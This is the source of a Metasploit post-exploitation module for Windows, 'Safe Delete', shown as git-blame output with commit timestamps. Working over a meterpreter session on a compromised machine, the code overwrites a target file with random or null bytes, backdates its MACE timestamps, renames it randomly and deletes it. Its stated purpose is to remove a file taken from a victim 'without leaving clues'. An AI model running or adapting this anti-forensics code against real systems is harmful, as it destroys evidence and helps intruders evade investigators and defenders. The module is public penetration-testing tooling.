2012-10-01 23:35:53 +00:00
|
|
|
##
|
2017-07-24 13:26:21 +00:00
|
|
|
# This module requires Metasploit: https://metasploit.com/download
|
2013-10-15 18:50:46 +00:00
|
|
|
# Current source: https://github.com/rapid7/metasploit-framework
|
2012-10-01 23:35:53 +00:00
|
|
|
##
|
|
|
|
|
2016-03-08 13:02:44 +00:00
|
|
|
class MetasploitModule < Msf::Post
|
2013-09-05 18:41:25 +00:00
|
|
|
include Msf::Post::Windows::Priv
|
|
|
|
include Msf::Post::File
|
|
|
|
|
|
|
|
def initialize(info={})
|
|
|
|
super( update_info( info,
|
|
|
|
'Name' => 'Windows Manage Safe Delete',
|
|
|
|
'Description' => %q{
|
|
|
|
The goal of the module is to hinder the recovery of deleted files by overwriting
|
|
|
|
its contents. This could be useful when you need to download some file on the victim
|
|
|
|
machine and then delete it without leaving clues about its contents. Note that the script
|
|
|
|
does not wipe the free disk space so temporary/sparse/encrypted/compressed files could
|
|
|
|
not be overwritten. Note too that MTF entries are not overwritten so very small files
|
|
|
|
could stay resident within the stream descriptor.},
|
|
|
|
'License' => BSD_LICENSE,
|
|
|
|
'Author' => [ 'Borja Merino <bmerinofe[at]gmail.com>'],
|
|
|
|
'Platform' => [ 'win' ],
|
|
|
|
'SessionTypes' => [ 'meterpreter' ]
|
|
|
|
))
|
|
|
|
|
|
|
|
register_options(
|
|
|
|
[
|
|
|
|
OptBool.new('ZERO', [ false, 'Zero overwrite. If set to false, random data will be used', false]),
|
|
|
|
OptInt.new('ITERATIONS', [false, 'The number of overwrite passes', 1 ]),
|
|
|
|
OptString.new('FILE',[true, 'File to be deleted',''])
|
2017-05-03 20:42:21 +00:00
|
|
|
])
|
2013-09-05 18:41:25 +00:00
|
|
|
end
|
|
|
|
|
|
|
|
|
|
|
|
def run
|
|
|
|
type = 1
|
|
|
|
n = datastore['ITERATIONS']
|
|
|
|
file = datastore['FILE']
|
|
|
|
|
2016-03-06 05:11:39 +00:00
|
|
|
if datastore['ZERO']
|
2013-09-05 18:41:25 +00:00
|
|
|
type = 0
|
|
|
|
print_status("The file will be overwritten with null bytes")
|
|
|
|
end
|
|
|
|
|
|
|
|
if !file_exist?(file)
|
|
|
|
print_error("File #{file} does not exist")
|
|
|
|
return
|
|
|
|
elsif comp_encr(file)
|
|
|
|
print_status("File compress or encrypted. Content could not be overwritten!")
|
|
|
|
end
|
|
|
|
file_overwrite(file,type,n)
|
|
|
|
end
|
|
|
|
|
|
|
|
|
|
|
|
#Function to calculate the size of the cluster
|
|
|
|
def size_cluster()
|
2013-12-19 01:43:59 +00:00
|
|
|
drive = session.sys.config.getenv('SystemDrive')
|
|
|
|
r = session.railgun.kernel32.GetDiskFreeSpaceA(drive,4,4,4,4)
|
2013-09-05 18:41:25 +00:00
|
|
|
cluster = r["lpBytesPerSector"] * r["lpSectorsPerCluster"]
|
|
|
|
print_status("Cluster Size: #{cluster}")
|
|
|
|
|
|
|
|
return cluster
|
|
|
|
end
|
|
|
|
|
|
|
|
|
|
|
|
#Function to calculate the real file size on disk (file size + slack space)
|
|
|
|
def size_on_disk(file)
|
2013-12-19 01:43:59 +00:00
|
|
|
size_file = session.fs.file.stat(file).size;
|
2013-09-05 18:41:25 +00:00
|
|
|
print_status("Size of the file: #{size_file}")
|
|
|
|
|
|
|
|
if (size_file<800)
|
|
|
|
print_status("The file is too small. If it's store in the MTF (NTFS) sdel will not overwrite it!")
|
|
|
|
end
|
|
|
|
|
|
|
|
sizeC= size_cluster()
|
|
|
|
size_ = size_file.divmod(sizeC)
|
|
|
|
|
|
|
|
if size_.last != 0
|
|
|
|
real_size = (size_.first * sizeC) + sizeC
|
|
|
|
else
|
|
|
|
real_size = size_.first * sizeC
|
|
|
|
end
|
|
|
|
|
|
|
|
print_status("Size on disk: #{real_size}")
|
|
|
|
return real_size
|
|
|
|
end
|
|
|
|
|
|
|
|
|
|
|
|
#Change MACE attributes. Get a fake date by subtracting N days from the current date
|
|
|
|
def change_mace(file)
|
|
|
|
rsec= Rex::Text.rand_text_numeric(7,bad='012')
|
|
|
|
date = Time.now - rsec.to_i
|
|
|
|
print_status("Changing MACE attributes")
|
2013-12-19 01:43:59 +00:00
|
|
|
session.priv.fs.set_file_mace(file, date,date,date,date)
|
2013-09-05 18:41:25 +00:00
|
|
|
end
|
|
|
|
|
|
|
|
#Function to overwrite the file
|
|
|
|
def file_overwrite(file,type,n)
|
|
|
|
#FILE_FLAG_WRITE_THROUGH: Write operations will go directly to disk
|
2013-12-19 01:43:59 +00:00
|
|
|
r = session.railgun.kernel32.CreateFileA(file, "GENERIC_WRITE", "FILE_SHARE_READ|FILE_SHARE_WRITE", nil, "OPEN_EXISTING", "FILE_FLAG_WRITE_THROUGH", 0)
|
2013-09-05 18:41:25 +00:00
|
|
|
handle=r['return']
|
|
|
|
real_size=size_on_disk(file)
|
|
|
|
|
|
|
|
if type==0
|
|
|
|
random="\0"*real_size
|
|
|
|
end
|
|
|
|
|
|
|
|
i=0
|
|
|
|
n.times do
|
|
|
|
i+=1
|
|
|
|
print_status("Iteration #{i.to_s}/#{n.to_s}:")
|
|
|
|
|
|
|
|
if type==1
|
|
|
|
random=Rex::Text.rand_text(real_size,nil)
|
|
|
|
end
|
|
|
|
|
|
|
|
#http://msdn.microsoft.com/en-us/library/windows/desktop/aa365541(v=vs.85).aspx
|
2013-12-19 01:43:59 +00:00
|
|
|
session.railgun.kernel32.SetFilePointer(handle,0,nil,"FILE_BEGIN")
|
2013-09-05 18:41:25 +00:00
|
|
|
|
|
|
|
#http://msdn.microsoft.com/en-us/library/windows/desktop/aa365747(v=vs.85).aspx
|
2013-12-19 01:43:59 +00:00
|
|
|
w=session.railgun.kernel32.WriteFile(handle,random,real_size,4,nil)
|
2013-09-05 18:41:25 +00:00
|
|
|
|
|
|
|
if w['return']==false
|
|
|
|
print_error("The was an error writing to disk, check permissions")
|
|
|
|
return
|
|
|
|
end
|
|
|
|
|
|
|
|
print_status("#{w['lpNumberOfBytesWritten']} bytes overwritten")
|
|
|
|
end
|
|
|
|
|
2013-12-19 01:43:59 +00:00
|
|
|
session.railgun.kernel32.CloseHandle(handle)
|
2013-09-05 18:41:25 +00:00
|
|
|
change_mace(file)
|
|
|
|
|
|
|
|
#Generate a long random file name before delete it
|
|
|
|
newname = Rex::Text.rand_text_alpha(200,nil)
|
|
|
|
print_status("Changing file name")
|
|
|
|
|
|
|
|
#http://msdn.microsoft.com/en-us/library/windows/desktop/aa365239(v=vs.85).aspx
|
2013-12-19 01:43:59 +00:00
|
|
|
session.railgun.kernel32.MoveFileA(file,newname)
|
2013-09-05 18:41:25 +00:00
|
|
|
|
|
|
|
file_rm(newname)
|
|
|
|
print_good("File erased!")
|
|
|
|
end
|
|
|
|
|
|
|
|
#Check if the file is encrypted or compressed
|
|
|
|
def comp_encr(file)
|
|
|
|
#http://msdn.microsoft.com/en-us/library/windows/desktop/aa364944(v=vs.85).aspx
|
2013-12-19 01:43:59 +00:00
|
|
|
handle=session.railgun.kernel32.GetFileAttributesA(file)
|
2013-09-05 18:41:25 +00:00
|
|
|
type= handle['return']
|
|
|
|
|
|
|
|
#FILE_ATTRIBUTE_COMPRESSED=0x800
|
|
|
|
#FILE_ATTRIBUTE_ENCRYPTED=0x4000
|
|
|
|
if ( type & (0x4800)).nonzero?
|
|
|
|
return true
|
|
|
|
end
|
|
|
|
return false
|
|
|
|
end
|
2012-10-01 23:35:53 +00:00
|
|
|
end
|